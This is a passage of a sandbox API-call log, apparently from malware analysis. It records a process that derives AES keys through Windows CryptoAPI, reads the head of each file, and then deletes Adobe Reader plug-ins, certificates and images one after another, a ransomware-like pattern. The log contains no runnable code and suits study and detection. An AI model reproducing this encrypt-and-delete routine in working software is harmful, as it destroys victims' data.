(x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\IA32.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\ia32.api")) returned 1 [0216.909] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0216.909] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0216.909] CryptHashData (hHash=0x284d728, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0216.909] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0216.909] GetFileSize (in: hFile=0x588, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x234a63 [0216.909] ReadFile (in: hFile=0x588, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0217.128] CryptDestroyHash (hHash=0x284d728) returned 1 [0217.128] CryptDestroyKey (hKey=0x284d568) returned 1 [0217.128] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0217.129] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\MakeAccessible.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\makeaccessible.api")) returned 1 [0217.180] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0217.208] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0217.276] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0217.278] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0217.282] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0217.283] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0217.321] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0217.332] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0217.474] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0217.519] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0217.554] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0217.589] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0217.589] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0217.590] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0217.590] CryptHashData (hHash=0x284d628, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0217.590] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0217.590] GetFileSize (in: hFile=0x624, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x174c63 [0217.590] ReadFile (in: hFile=0x624, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0217.679] CryptDestroyHash (hHash=0x284d628) returned 1 [0217.679] CryptDestroyKey (hKey=0x284d568) returned 1 [0217.679] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0217.680] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia.api")) returned 1 [0217.685] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0217.685] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0217.685] CryptHashData (hHash=0x284d728, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0217.685] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0217.685] GetFileSize (in: hFile=0x588, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x69263 [0217.685] ReadFile (in: hFile=0x588, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0217.707] CryptDestroyHash (hHash=0x284d728) returned 1 [0217.707] CryptDestroyKey (hKey=0x284d568) returned 1 [0217.707] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0217.708] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\PDDom.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\pddom.api")) returned 1 [0217.712] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0217.713] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0217.713] CryptHashData (hHash=0x284d628, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0217.713] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0217.713] GetFileSize (in: hFile=0x624, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x73f263 [0217.713] ReadFile (in: hFile=0x624, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0218.815] CryptDestroyHash (hHash=0x284d628) returned 1 [0218.815] CryptDestroyKey (hKey=0x284d568) returned 1 [0218.815] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0218.817] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\PPKLite.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\ppklite.api")) returned 1 [0218.821] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0218.821] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0218.821] CryptHashData (hHash=0x284d728, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0218.821] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0218.821] GetFileSize (in: hFile=0x588, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1b663 [0218.821] ReadFile (in: hFile=0x588, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0218.828] CryptDestroyHash (hHash=0x284d728) returned 1 [0218.828] CryptDestroyKey (hKey=0x284d568) returned 1 [0218.828] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0218.830] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\ReadOutLoud.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\readoutloud.api")) returned 1 [0218.831] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0218.832] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0218.832] CryptHashData (hHash=0x284d628, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0218.832] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0218.832] GetFileSize (in: hFile=0x624, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x54e63 [0218.832] ReadFile (in: hFile=0x624, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0218.852] CryptDestroyHash (hHash=0x284d628) returned 1 [0218.852] CryptDestroyKey (hKey=0x284d568) returned 1 [0218.852] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0218.853] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\reflow.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\reflow.api")) returned 1 [0218.893] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0218.893] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0218.893] CryptHashData (hHash=0x284d728, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0218.893] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0218.893] GetFileSize (in: hFile=0x588, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x63263 [0218.893] ReadFile (in: hFile=0x588, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0218.920] CryptDestroyHash (hHash=0x284d728) returned 1 [0218.920] CryptDestroyKey (hKey=0x284d568) returned 1 [0218.920] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0218.922] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\SaveAsRTF.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\saveasrtf.api")) returned 1 [0218.925] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0218.926] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0218.926] CryptHashData (hHash=0x284d628, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0218.926] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0218.926] GetFileSize (in: hFile=0x624, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x69063 [0218.926] ReadFile (in: hFile=0x624, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0218.952] CryptDestroyHash (hHash=0x284d628) returned 1 [0218.952] CryptDestroyKey (hKey=0x284d568) returned 1 [0218.952] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0218.954] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Search.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\search.api")) returned 1 [0218.961] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0218.962] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0218.962] CryptHashData (hHash=0x284d728, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0218.962] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0218.962] GetFileSize (in: hFile=0x588, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x25c63 [0218.962] ReadFile (in: hFile=0x588, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0218.970] CryptDestroyHash (hHash=0x284d728) returned 1 [0218.970] CryptDestroyKey (hKey=0x284d568) returned 1 [0218.970] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0218.971] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\SendMail.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\sendmail.api")) returned 1 [0218.975] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0218.975] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0218.975] CryptHashData (hHash=0x284d628, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0218.975] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0218.975] GetFileSize (in: hFile=0x624, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x43a63 [0218.975] ReadFile (in: hFile=0x624, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0219.025] CryptDestroyHash (hHash=0x284d628) returned 1 [0219.025] CryptDestroyKey (hKey=0x284d568) returned 1 [0219.025] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0219.027] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Spelling.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\spelling.api")) returned 1 [0219.065] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0219.066] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.066] CryptHashData (hHash=0x284d728, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.066] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0219.066] GetFileSize (in: hFile=0x588, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x29463 [0219.066] ReadFile (in: hFile=0x588, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0219.161] CryptDestroyHash (hHash=0x284d728) returned 1 [0219.161] CryptDestroyKey (hKey=0x284d568) returned 1 [0219.161] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0219.162] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Updater.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\updater.api")) returned 1 [0219.164] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0219.164] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.164] CryptHashData (hHash=0x284d628, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.164] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0219.164] GetFileSize (in: hFile=0x624, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4ac63 [0219.164] ReadFile (in: hFile=0x624, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0219.202] CryptDestroyHash (hHash=0x284d628) returned 1 [0219.202] CryptDestroyKey (hKey=0x284d568) returned 1 [0219.202] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0219.203] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\weblink.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\weblink.api")) returned 1 [0219.220] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0219.221] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0219.242] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0219.242] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0219.242] CryptHashData (hHash=0x284d5e8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.242] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d728) returned 1 [0219.242] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1a4 [0219.242] ReadFile (in: hFile=0x608, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0219.244] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0219.244] CryptDestroyKey (hKey=0x284d728) returned 1 [0219.244] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0219.245] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\pmd.cer" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\pmd.cer")) returned 1 [0219.281] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0219.281] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0219.282] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.282] CryptHashData (hHash=0x284d728, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.282] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0219.282] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7f79 [0219.282] ReadFile (in: hFile=0x608, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0219.295] CryptDestroyHash (hHash=0x284d728) returned 1 [0219.295] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0219.295] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0219.296] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services\\Services.cfg" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\services\\services.cfg")) returned 1 [0219.298] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0219.311] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0219.313] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0219.314] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.314] CryptHashData (hHash=0x284d628, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.314] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0219.314] GetFileSize (in: hFile=0x624, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x53a [0219.314] ReadFile (in: hFile=0x624, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0219.316] CryptDestroyHash (hHash=0x284d628) returned 1 [0219.316] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0219.316] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0219.317] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\add_reviewer.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\add_reviewer.gif")) returned 1 [0219.318] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0219.319] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.319] CryptHashData (hHash=0x284d728, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.319] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0219.319] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x53 [0219.319] ReadFile (in: hFile=0x608, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x53, lpOverlapped=0x0) returned 1 [0219.321] CryptDestroyHash (hHash=0x284d728) returned 1 [0219.321] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0219.321] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0219.322] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\bl.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\bl.gif")) returned 1 [0219.323] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0219.324] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.324] CryptHashData (hHash=0x284d628, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.324] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0219.324] GetFileSize (in: hFile=0x624, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x52 [0219.324] ReadFile (in: hFile=0x624, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x52, lpOverlapped=0x0) returned 1 [0219.325] CryptDestroyHash (hHash=0x284d628) returned 1 [0219.325] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0219.325] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0219.332] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\br.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\br.gif")) returned 1 [0219.333] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0219.333] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.333] CryptHashData (hHash=0x284d728, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.333] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0219.333] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4aa [0219.333] ReadFile (in: hFile=0x608, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0219.347] CryptDestroyHash (hHash=0x284d728) returned 1 [0219.347] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0219.347] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0219.349] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\create_form.gif" (normalized: "c:\\program files 